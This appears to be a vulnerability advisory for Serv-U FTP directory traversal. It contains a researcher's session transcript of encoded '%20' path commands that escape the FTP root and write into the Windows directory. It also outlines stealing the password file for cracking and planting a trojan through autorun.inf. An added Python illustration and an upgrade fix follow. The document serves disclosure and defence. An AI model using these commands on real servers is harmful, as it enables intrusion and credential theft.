COMMAND
Serv-U
SYSTEMS AFFECTED
Serv-U FTP all versions
PROBLEM
Zoa Chien found the following. This was tested on Serv-U FTP 2.4a,
2.5h, 3.0beta, ... (all versions?). Let's just dump what the author
tried (skip this):
Normal use: 1.txt is a file in the homedir.
ftp> get 1.txt
200 PORT Command successful.
150 Opening ASCII mode data connection for 1.txt (7 bytes).
226 Transfer complete.
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)
Let's see what happens to hex codes: %2E=. %31=1 %20=space ...
ftp> get 1%2etxt
200 PORT Command successful.
550 /1%2etxt: No such file or directory.
ftp>
--> %2e is not decoded
ftp> get 1.%20txt
200 PORT Command successful.
550 /1. txt: No such file or directory.
--> %20 is decoded to a space. (to be compatible with browsers)
ftp> get %201.txt
200 PORT Command successful.
150 Opening ASCII mode data connection for 1.txt (7 bytes).
226 Transfer complete.
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)
--> hey, look: if the space is at the beginning of the filename,
it is just skipped.
Let's try this on the cd command:
ftp> cd \.a%20\
550 /.a: No such file or directory.
--> space is skipped again...
ftp> cd \a%20a\
550 /a a: No such file or directory.
ftp>
ftp> cd \a%20.\
550 /a: No such file or directory.
ftp>
--> heh? wtf, the %20 will remove the .
Let's try to play around with that:
ftp> cd \.%20.
250 Directory changed to /Ftproot
--> Hey, look, the ftp client reveals the ftp dir... that's fun
Let's keep playing
ftp> cd \..%20.
250 Directory changed to /..
--> oh ow, this looks like trouble
ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
-rwxrwxrwx 1 user group 1127 Nov 30 22:06 rootdir.txt
...
226 Transfer complete.
1180 bytes received in 0.00 seconds (1180000.00 Kbytes/sec)
ftp>
Ouch, that hurts...
ftp> cd %20..%20%20../winnt\
250 Directory changed to /c:/TOMB/../WINNT
ftp>
You can only use this when you are in your homedir. You can only
use GET ... when you are in your homedir, so first changing to
/winnt and then "get" will not work.
ftp> put autoexec.bat %20..%20%20../winnt/2.bat
200 PORT Command successful.
150 Opening ASCII mode data connection for 2.bat.
226 Transfer complete.
ftp> dir \..%20.\..%20.\winnt\
Serv-U FTP will reveal the full path to the ftproot with "cd
\.%20" (even if the "show path relative to home dir" option is on);
using pwd will work too. It will allow read/write/execute/list
access to any other file on the partition of the ftproot if you
have read/write/exec/list access on your home dir (note that the
option "inherit subdirs" must be clicked on, otherwise "cd" will
not work).
Serv-U will allow listing of hidden files, even if "hide hidden
files" is on, with "DIR .". The exploit also works on Serv-U FTP
2.4a... but you might have to use a different string: dir
%20..%20%20..\*.
This is a severe bug and should be patched ASAP. If the ftproot
is on the c: drive, serv-U.ini can be retrieved, which contains all
passwords of the ftp users (and can be brute forced with John the
Ripper). That way, you could find logins that allow executing...
and you can upload and execute a trojan.
Even if the ftproot is not on the same drive as serv-u.ini, you
can still upload a trojan and let this trojan execute by using an
autorun.inf on e.g. d:\ which points to our trojan. If the
sysadmin uses "My Computer" instead of explorer.exe, the trojan
will be executed.
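As an added illustration (not part of the advisory and not Serv-U's code), the two resolvers below contrast the validate-before-decode ordering that the transcript above implies with the decode-then-validate ordering a server should use. The name trimming in _trim is an assumed simplification of the behaviour seen in the transcript (surrounding spaces and trailing dots dropped), and /c:/ftproot is a constructed root.

```python
import posixpath
from urllib.parse import unquote

# Constructed FTP root for the demonstration (not the advisory's real path).
FTP_ROOT = "/c:/ftproot"

def _raw_components(arg: str) -> list[str]:
    """Split a client argument on either separator, still percent-encoded."""
    return [c for c in arg.replace("\\", "/").split("/") if c]

def _trim(component: str) -> str:
    """Assumed model of how a decoded name is interpreted, matching what the
    advisory observes: surrounding spaces and trailing dots are dropped, but a
    name made only of dots and spaces collapses to its leading '.' or '..'."""
    name = component.strip(" ")
    core = name.rstrip(" .")
    if core:
        return core
    return name[: len(name) - len(name.lstrip("."))]

def _decoded_components(arg: str) -> list[str]:
    """Percent-decode, then apply the name trimming, dropping empty parts."""
    return [t for t in (_trim(unquote(c)) for c in _raw_components(arg)) if t]

def vulnerable_resolve(arg: str) -> str:
    """Validate-before-decode, the ordering the transcript implies: the '..'
    check runs on the still-encoded components, so '..%20.' passes, and only
    afterwards is it decoded and trimmed down to '..'."""
    if any(c == ".." for c in _raw_components(arg)):
        raise PermissionError("traversal rejected")
    return posixpath.normpath(posixpath.join(FTP_ROOT, *_decoded_components(arg)))

def safe_resolve(arg: str) -> str:
    """Decode and trim first, normalise, then confine the result to the root."""
    target = posixpath.normpath(posixpath.join(FTP_ROOT, *_decoded_components(arg)))
    if target != FTP_ROOT and not target.startswith(FTP_ROOT + "/"):
        raise PermissionError("path escapes the FTP root")
    return target

def escapes_root(arg: str) -> bool:
    """True when the decoded, normalised path would leave the FTP root."""
    try:
        safe_resolve(arg)
    except PermissionError:
        return True
    return False

if __name__ == "__main__":
    print({a: (vulnerable_resolve(a), escapes_root(a)) for a in ["1.txt", "\\..%20."]})
```

Path disclosure via "cd \.%20." is a separate presentation issue: safe_resolve correctly accepts it as the root itself, so the reply text, not the resolver, must hide the real location.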
SOLUTION
Upgrade to version 2.5i, available at:
http://ftpserv-u.deerfield.com/download/